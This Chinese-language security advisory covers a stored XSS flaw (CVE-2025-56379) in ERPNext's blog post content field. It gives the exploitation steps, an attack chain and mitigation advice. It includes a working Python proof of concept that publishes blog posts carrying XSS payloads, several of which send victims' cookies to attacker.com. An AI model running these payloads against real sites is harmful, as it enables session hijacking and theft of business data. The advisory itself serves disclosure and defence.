CVE-2025-56379：ERPNEXT博客功能存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-56379

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

ERPNEXT

漏洞概述

CVE-2025-56379是ERPNEXT企业资源规划系统v15.67.0版本中博客文章功能（Blog Post Feature）存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由安全研究员MoAlali发现并报告，于2025年10月2日由MITRE机构公开披露。根据CVSS 3.1评分体系，该漏洞评分为5.4分，属于中危级别。

ERPNEXT是一款基于Python和JavaScript开发的开源企业资源规划（ERP）软件，广泛应用于企业的财务管理、库存管理、客户关系管理、人力资源等多个业务领域。由于其用户群体广泛且涉及大量敏感业务数据，安全性至关重要。该漏洞位于博客文章的内容字段（content field）中，攻击者可以通过精心构造的恶意负载（payload）注入到该字段中，当其他用户查看该博客文章时，恶意脚本将在受害者浏览器中执行。

存储型XSS漏洞的危害性通常较高，因为恶意脚本被永久存储在目标服务器上，每当有用户访问受影响的页面时都会触发。与反射型XSS不同，存储型XSS不需要诱导受害者点击特定链接，攻击者只需发布包含恶意代码的内容即可影响所有访问该页面的用户。在企业ERP系统中，这类漏洞可能被利用来窃取用户会话、获取敏感业务数据、进行权限提升或作为进一步攻击的跳板，对企业信息安全构成严重威胁。

技术细节

该漏洞的根本原因在于ERPNEXT v15.67.0的博客文章功能在处理用户输入的内容字段时，未能对用户提交的数据进行充分的过滤和转义处理。具体而言，当用户创建或编辑博客文章时，系统将content字段中的原始HTML/JavaScript代码直接存储到数据库中，而未对其中可能包含的恶意脚本标签（如<script>、<img onerror=>、<svg onload=>等）进行适当的过滤或编码。

漏洞利用流程如下：
1. 攻击者首先需要获得系统的低权限账户（PR:L），这可以通过注册新用户或利用其他途径获取。
2. 攻击者登录系统后，访问博客文章创建功能，在content字段中注入精心构造的XSS负载，例如：<script>alert(document.cookie)</script>或<img src=x onerror=alert(document.domain)>。
3. 提交博客文章后，恶意负载被存储到后端数据库中。
4. 当其他用户（包括管理员）浏览该博客文章页面时，服务器返回包含未转义恶意脚本的HTML内容。
5. 受害者的浏览器解析并执行该恶意脚本，攻击者可借此窃取Cookie、会话令牌，或执行其他恶意操作。

由于该漏洞需要用户交互（UI:R）才能触发（即受害者需要主动访问受感染的博客文章页面），且攻击复杂度较低（AC:L），同时影响范围会发生变化（S:C），表明该漏洞可能影响到超出预期安全上下文的组件。攻击者可通过此漏洞窃取用户凭证、劫持会话、进行钓鱼攻击或作为企业内网渗透的入口点。

攻击链分析

STEP 1

步骤1：获取初始访问

攻击者通过注册新账户或利用泄露的凭证获得ERPNEXT系统的低权限用户访问权限。

STEP 2

步骤2：构造恶意负载

攻击者精心构造包含JavaScript代码的XSS负载，如窃取Cookie、会话劫持或执行其他恶意操作的脚本。

STEP 3

步骤3：注入恶意内容

攻击者利用博客文章创建功能，将恶意负载注入到content字段中并提交保存，由于系统未对输入进行充分过滤，恶意代码被存储到数据库。

STEP 4

步骤4：等待受害者触发

当合法用户（包括管理员或其他具有更高权限的用户）浏览包含恶意负载的博客文章时，浏览器解析并执行其中的恶意脚本。

STEP 5

步骤5：执行恶意操作

恶意脚本在受害者浏览器上下文中执行，攻击者可窃取会话Cookie、获取敏感数据、进行权限提升或作为内网渗透的跳板。

STEP 6

步骤6：横向移动与数据窃取

利用获取的高权限账户，攻击者可访问ERP系统中的财务数据、客户信息等敏感业务数据，造成严重的数据泄露和业务影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-56379 - ERPNEXT Stored XSS PoC
# Vulnerability: Stored XSS in Blog Post content field
# Affected Version: ERPNEXT v15.67.0

import requests

# Configuration
TARGET_URL = "https://target-erpnext-site.com"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Login to ERPNEXT to obtain session cookies
session = requests.Session()
login_data = {
    "usr": USERNAME,
    "pwd": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/api/method/login", json=login_data)
print(f"Login status: {login_response.status_code}")

# Step 2: Craft malicious XSS payload for the blog content field
# Various payload options for bypassing filters
xss_payloads = [
    # Basic script tag payload
    "<script>alert('XSS-CVE-2025-56379');document.location='https://attacker.com/steal?c='+document.cookie</script>",
    # Img tag with onerror event handler
    "<img src=x onerror=\"alert(document.domain);fetch('https://attacker.com/log?data='+document.cookie)\">",
    # SVG tag with onload event handler
    "<svg onload=\"alert('Stored XSS');document.location='https://attacker.com/?cookie='+document.cookie\">",
    # HTML entity encoded payload
    "<script>eval(atob('YWxlcnQoJ1hTUycp'))</script>"
]

# Step 3: Create a blog post with the malicious payload
for idx, payload in enumerate(xss_payloads):
    blog_data = {
        "title": f"Interesting Blog Post {idx}",
        "content": payload,
        "blog_category": "General",
        "published": 1
    }

    create_response = session.post(
        f"{TARGET_URL}/api/resource/Blog Post",
        json=blog_data,
        headers={"Accept": "application/json"}
    )
    print(f"Blog post {idx} creation status: {create_response.status_code}")
    print(f"Response: {create_response.text}")

# Step 4: Verify the payload is stored and will execute when viewed
# When any user visits the blog post page, the malicious script will execute
print("\n[!] Malicious blog posts created successfully.")
print("[!] When any user views these blog posts, the XSS payload will execute in their browser.")
print("[!] Attacker can now steal session cookies, perform actions on behalf of victims, etc.")

影响范围

ERPNEXT v15.67.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制博客文章发布功能的使用权限，仅允许经过审核的可信用户发布内容；2）在Web服务器或反向代理层面部署内容安全策略（CSP），限制内联脚本执行；3）为所有会话Cookie添加HttpOnly标志，防止通过XSS窃取会话；4）使用Web应用防火墙（WAF）规则过滤常见的XSS负载；5）对现有博客文章进行审查，删除或清理可疑内容；6）密切监控系统日志，检测异常的用户行为和潜在的会话劫持活动；7）建议用户和管理员在访问博客文章时保持警惕，避免在浏览器中保存敏感凭证。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-56379
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-56379
3 Details https://www.cvedetails.com/cve/CVE-2025-56379/
4 VulDB https://vuldb.com/cve/CVE-2025-56379
5 Link https://github.com/MoAlali/
6 Link https://github.com/MoAlali/CVE-2025-56379
7 Link https://www.linkedin.com/in/mohammedaloli/
8 Link https://x.com/alaliksa_
9 Link https://github.com/MoAlali/CVE-2025-56379